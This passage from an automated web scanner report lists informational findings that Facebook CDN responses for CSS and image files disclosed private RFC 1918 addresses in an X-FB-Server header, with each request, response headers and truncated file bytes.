Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:35:13 GMT
X-FB-Server: 10.138.64.183
Content-Length: 1355
Vary: Accept-Encoding
Cache-Control: public, max-age=30932546
Expires: Wed, 11 Jul 2012 15:19:49 GMT
Date: Tue, 19 Jul 2011 14:57:23 GMT
Connection: close

/*1310484050,176832695*/

.dialog_page_wrapper{margin-top:20px;margin-left:auto;margin-right:auto}
.dialog_page_wrapper .pop_content{border:1px solid #cfcfcf;-webkit-border-radius:5px}
.dialog_page_wr
...[SNIP]...

24.129. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/AKFdbdR6W5B.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yz/r/AKFdbdR6W5B.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yz/r/AKFdbdR6W5B.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 11 May 2011 05:30:34 GMT
X-FB-Server: 10.30.145.199
X-Cnection: close
Content-Length: 4206
Vary: Accept-Encoding
Cache-Control: public, max-age=25596787
Expires: Thu, 10 May 2012 21:10:53 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

/*1305148200,169775559*/

.UITwoColumnLayout_Container{margin:0}
.UITwoColumnLayout_Content{float:left}
.UITwoColumnLayout_NarrowContent{float:right}
.UITwoColumnLayout_LeftOrientation .UITwoColumnLay
...[SNIP]...

24.130. http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/deIrY85PE2v.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z-/r/deIrY85PE2v.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z-/r/deIrY85PE2v.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/pages/create.php?ref_type=sitefooter
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 70245
Content-Type: image/png
Last-Modified: Wed, 29 Jun 2011 21:13:43 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Cache-Control: public, max-age=30234441
Expires: Tue, 03 Jul 2012 13:25:11 GMT
Date: Tue, 19 Jul 2011 14:57:50 GMT
Connection: close

.PNG
.
...IHDR...o.........0......,IDATx..}    tdW.._..{...*....V.Ww...i.c|....C.6.`.30...!d&3..3p29$..$.&....L.C.    ...&.1...m.m.W.z..RIU.......=.JR.RIn..}.J.R.{....\Or:C...R.\<zh..j...../cRW,.j
YW...h
...[SNIP]...

24.131. http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/ukvLMiNkr_t.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z-/r/ukvLMiNkr_t.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z-/r/ukvLMiNkr_t.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 343
Content-Type: image/png
Last-Modified: Sun, 10 Jul 2011 12:18:46 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Cache-Control: public, max-age=30813218
Expires: Tue, 10 Jul 2012 06:11:31 GMT
Date: Tue, 19 Jul 2011 14:57:53 GMT
Connection: close

.PNG
.
...IHDR...!...6...........0PLTE..................Kf.m.....Jf................Kg.8.).....tRNS....T.0!+....IDATx^..1..@..7..-,..1....#X.,.n.I....!..hHX+..    ...x...Y..x...    ..2..]1....    ...n"....%
...[SNIP]...

24.132. http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/v3dJrMQoPk1.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z-/r/v3dJrMQoPk1.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z-/r/v3dJrMQoPk1.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/help/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1592
Content-Type: image/png
Last-Modified: Mon, 11 Jul 2011 01:48:17 GMT
X-FB-Server: 10.138.64.183
Cache-Control: public, max-age=30931892
Expires: Wed, 11 Jul 2012 15:09:31 GMT
Date: Tue, 19 Jul 2011 14:57:59 GMT
Connection: close

.PNG
.
...IHDR.............K......PLTE.......................akkkRuq.............z[...4i.pz.bn{....tI..R...........mlll.}S............[[[........a........`^^^.~a......888......My...2.ybCQa...;m..{k
...[SNIP]...

24.133. http://static.ak.fbcdn.net/rsrc.php/v1/z1/r/qcTMR8qeslF.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z1/r/qcTMR8qeslF.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z1/r/qcTMR8qeslF.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:15 GMT
X-FB-Server: 10.138.69.183
Content-Length: 56848
Vary: Accept-Encoding
Cache-Control: public, max-age=30424624
Expires: Thu, 05 Jul 2012 18:15:02 GMT
Date: Tue, 19 Jul 2011 14:57:58 GMT
Connection: close

.PNG
.
...IHDR..............W......tRNS......    .......IDATx^..... .C......|*@1.aW<......9V..$.UUU....7l...........20...;~$1.....o..~..........>n.N....!.. ..P....d.f!.....8I;EDD.n.>....?....@... ...

...[SNIP]...

24.134. http://static.ak.fbcdn.net/rsrc.php/v1/z4/r/EAbydW1M_XR.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z4/r/EAbydW1M_XR.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z4/r/EAbydW1M_XR.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 19:53:27 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.64.182
Content-Length: 24273
Vary: Accept-Encoding
Cache-Control: public, max-age=20606062
Expires: Wed, 14 Mar 2012 02:51:57 GMT
Date: Tue, 19 Jul 2011 14:57:35 GMT
Connection: close

.PNG
.
...IHDR.............T.a...^.IDATx....WSg...\......r......iWWm.tYY.v.....T.!#.".."...T.9@...!b...@...I...T..P(.3.......H..Ux.YO.I....../.....r.\.........r....!...~.....D....#j...F.n...8os.!..
...[SNIP]...

24.135. http://static.ak.fbcdn.net/rsrc.php/v1/z6/r/l9Fe9Ugss0S.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z6/r/l9Fe9Ugss0S.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z6/r/l9Fe9Ugss0S.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 892
Content-Type: image/gif
Last-Modified: Wed, 02 Mar 2011 04:58:52 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Cache-Control: public, max-age=28443194
Expires: Tue, 12 Jun 2012 19:51:00 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

GIF89a......bz....Oj.Zs..........z.....v..;Y...........................................................................................................................................................
...[SNIP]...

24.136. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/UvyvLtJTQzO.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z7/r/UvyvLtJTQzO.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z7/r/UvyvLtJTQzO.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 111
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 12:46:48 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.184
Cache-Control: public, max-age=20580630
Expires: Tue, 13 Mar 2012 19:48:16 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

.PNG
.
...IHDR...    ...........T(....PLTEs.Q....N......tRNS.@..f....IDAT..c.``.a`.c`.g`.......a.V......IEND.B`.

24.137. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/Z6rULnd-GE-.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z9/r/Z6rULnd-GE-.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z9/r/Z6rULnd-GE-.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 571
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 14:22:33 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.182
Cache-Control: public, max-age=20586297
Expires: Tue, 13 Mar 2012 21:22:31 GMT
Date: Tue, 19 Jul 2011 14:57:34 GMT
Connection: close

.PNG
.
...IHDR...&..........T......PLTE.........n..p.._x.s.....\u.............g~._w....z..i..p..x..n..\v....t.................w.....w.............................f~....r.....f}....t..c{..........d|.
...[SNIP]...

24.138. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/e4jQ5MXLYQ8.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z9/r/e4jQ5MXLYQ8.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z9/r/e4jQ5MXLYQ8.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 54735
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 12:39:11 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.64.184
Cache-Control: public, max-age=20666489
Expires: Wed, 14 Mar 2012 19:39:21 GMT
Date: Tue, 19 Jul 2011 14:57:52 GMT
Connection: close

.PNG
.
...IHDR.......n.....y.._....PLTE...p...........i.................................................................u...........z.................................................................
...[SNIP]...

24.139. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z9/r/jKEcVPZFk-2.gif HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 12:54:09 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.16.185
Content-Length: 1900
Vary: Accept-Encoding
Cache-Control: public, max-age=20567486
Expires: Tue, 13 Mar 2012 19:55:11 GMT
Date: Tue, 19 Jul 2011 18:43:45 GMT
Connection: close

GIF89a . ....Ro.y.................e~.........................................................................!..NETSCAPE2.0.....!.......,.... . .... &.di.h..l..p,..AX.E....../.#\.H...<*G...y..,..u....
...[SNIP]...

24.140. http://static.ak.fbcdn.net/rsrc.php/v1/zB/r/TwAHgQi2ZPB.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zB/r/TwAHgQi2ZPB.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zB/r/TwAHgQi2ZPB.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1203
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 12:49:58 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.183
Cache-Control: public, max-age=20580745
Expires: Tue, 13 Mar 2012 19:50:00 GMT
Date: Tue, 19 Jul 2011 14:57:35 GMT
Connection: close

.PNG
.
...IHDR.......O.....a1......PLTE...............................................................................................................................................................
...[SNIP]...

24.141. http://static.ak.fbcdn.net/rsrc.php/v1/zB/r/Unmn04Ngmxd.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zB/r/Unmn04Ngmxd.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zB/r/Unmn04Ngmxd.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 232
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 17:08:09 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.145.197
X-Cnection: close
Cache-Control: public, max-age=20596278
Expires: Wed, 14 Mar 2012 00:08:51 GMT
Date: Tue, 19 Jul 2011 14:57:33 GMT
Connection: close

GIF89a..........HPa.l3............S^l...NXg.......G.fm{.........sy...........................................!.......,..........e E=N.4.#...AS.E.+>...K.......,.G..akLx
.!6i....u.hn..!.;Y.p.I.Fq.....=*
...[SNIP]...

24.142. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/hIGTc2UFq5P.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zD/r/hIGTc2UFq5P.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zD/r/hIGTc2UFq5P.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 43183
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:15 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Cache-Control: public, max-age=30428336
Expires: Thu, 05 Jul 2012 19:16:31 GMT
Date: Tue, 19 Jul 2011 14:57:35 GMT
Connection: close

.PNG
.
...IHDR.......d......<......tRNS......    ......dIDATx^..A.. ...^.K.....$....;..F...8..........4.....[`...AP.....*..U...b..Sc..Z....M5.....%.M.......1.Z....J..".......Py...}.o..b..    ........w....
...[SNIP]...

24.143. http://static.ak.fbcdn.net/rsrc.php/v1/zE/r/eh0bmn9m_mm.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zE/r/eh0bmn9m_mm.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zE/r/eh0bmn9m_mm.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 11938
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:15 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Cache-Control: public, max-age=30424594
Expires: Thu, 05 Jul 2012 18:14:30 GMT
Date: Tue, 19 Jul 2011 14:57:56 GMT
Connection: close

.PNG
.
...IHDR.......l.....)/.X....tRNS......    ......WIDATx^.Y[..G......t..x..&..8H.o.% ....x!.......o.'...I..v......V..S...x......33.g.[55....w.-....3M.'.kB....o...#.VZ+.$.p.D.......n....7^...H..mOl
...[SNIP]...

24.144. http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zF/r/p13yZ069LVL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zF/r/p13yZ069LVL.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 792
Content-Type: image/png
Last-Modified: Tue, 07 Jun 2011 17:59:39 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Cache-Control: public, max-age=28381977
Expires: Tue, 12 Jun 2012 02:50:12 GMT
Date: Tue, 19 Jul 2011 14:57:15 GMT
Connection: close

.PNG
.
...IHDR.......0.............sRGB.........bKGD.............    pHYs.................tIME.....03a2....."tEXtComment.Created with GIMP on a Mac..wC...jIDATx^..QM.Q.D...v4.......k....lW..s...>.>...
...[SNIP]...

24.145. http://static.ak.fbcdn.net/rsrc.php/v1/zI/r/llncLdVc0JC.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zI/r/llncLdVc0JC.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zI/r/llncLdVc0JC.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 60
Content-Type: image/gif
Last-Modified: Mon, 15 Mar 2010 12:39:11 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.147.197
X-Cnection: close
Cache-Control: public, max-age=20666492
Expires: Wed, 14 Mar 2012 19:39:25 GMT
Date: Tue, 19 Jul 2011 14:57:53 GMT
Connection: close

GIF89a..    .......<\.......!.......,......    .....a..m....%.(.;

24.146. http://static.ak.fbcdn.net/rsrc.php/v1/zJ/r/RVElCNYrs5z.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zJ/r/RVElCNYrs5z.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zJ/r/RVElCNYrs5z.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 17:08:11 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.147.196
X-Cnection: close
Cache-Control: public, max-age=20596224
Expires: Wed, 14 Mar 2012 00:07:58 GMT
Date: Tue, 19 Jul 2011 14:57:34 GMT
Connection: close

GIF89a.........jp~...}...........AEM[am.....................!.......,.........>0...Mb.......[..Iap...b.....&..2]........FO..D&$..E.....lB#..".;

24.147. http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/7ngmhwdsni2.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zM/r/7ngmhwdsni2.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zM/r/7ngmhwdsni2.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2950
Content-Type: image/png
Last-Modified: Sun, 10 Jul 2011 12:18:47 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Cache-Control: public, max-age=30803365
Expires: Tue, 10 Jul 2012 03:26:55 GMT
Date: Tue, 19 Jul 2011 14:57:30 GMT
Connection: close

.PNG
.
...IHDR...%..........P.....MIDATx...]l....W..(.C..*.*?...S.R).
...JE.....-Q...4..(.J....M.C.K.....B...6fAa.q....T.    W.......Fa..?.............]c.J.w....q..;wgv ...6....X....*....T*..gFj.Ka    %.x
...[SNIP]...

24.148. http://static.ak.fbcdn.net/rsrc.php/v1/zP/r/FzmFaNDPhjU.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zP/r/FzmFaNDPhjU.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zP/r/FzmFaNDPhjU.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 4608
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:15 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Cache-Control: public, max-age=30241373
Expires: Tue, 03 Jul 2012 15:20:25 GMT
Date: Tue, 19 Jul 2011 14:57:32 GMT
Connection: close

.PNG
.
...IHDR...$...l.............IDATx^..iXS...5.Sj)m)Zk)..-..J..0.".A..80.....3...J.
.RGD...**("...(d$@..qB.L."E...:Qhi..b..A.g=....y....kO._.<..Q.L.M.M.-...L.x3M.y~.C."-_.c*.i(..<..i.........3..
...[SNIP]...

24.149. http://static.ak.fbcdn.net/rsrc.php/v1/zQ/r/WBWgBVeCy7Y.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zQ/r/WBWgBVeCy7Y.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zQ/r/WBWgBVeCy7Y.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 171
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 17:08:10 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.145.197
X-Cnection: close
Cache-Control: public, max-age=20596192
Expires: Wed, 14 Mar 2012 00:07:26 GMT
Date: Tue, 19 Jul 2011 14:57:34 GMT
Connection: close

GIF89a............................bbb......5T................!.......,..........X..I)X8..{?.f.dY.`.l.A.B..$1(x..tA(..P..p|..r.@($,A..tb..)..B-.L....V.
.".C4q.......u.....;

24.150. http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/6DyuwYMrMc0.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
